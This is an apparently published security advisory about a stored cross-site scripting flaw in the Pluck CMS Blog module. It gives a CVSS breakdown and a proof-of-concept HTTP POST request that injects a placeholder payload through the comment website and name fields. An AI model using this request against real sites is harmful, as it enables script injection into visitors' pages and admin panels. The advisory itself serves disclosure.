Pluck CMS Blog module Stored XSS

2018.02.19
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Pluck CMS allows website owners to add blogs to their website through the Blog Module. The Blog Module enables commenting by default which enables this attack easily. This vulnerability will allow an attacker to inject arbitrary web script or HTML into the admin panel and blog Reaction Comments. Proof of concept: POST /pluck/?file=yourpost&module=blog&page=yourpost&post=yourpostHTTP/1.1 Host: XXX.XXX.XXX.XXX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 142 Cookie: PHPSESSID=60p765gnl6o3b9emgvqng0f5o4 Connection: close Upgrade-Insecure-Requests: 1 blog_reaction_name=Test&blog_reaction_email=test%40att.lol&blog_reaction_website=http%3A%2F%2Fpluck.com/?XSSPAYLOAD&blog_reaction_message=test&submit=Send This will fire in the page and fire in the back end. There's other parameters also vulnerable to xss as well such as the name parameter.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top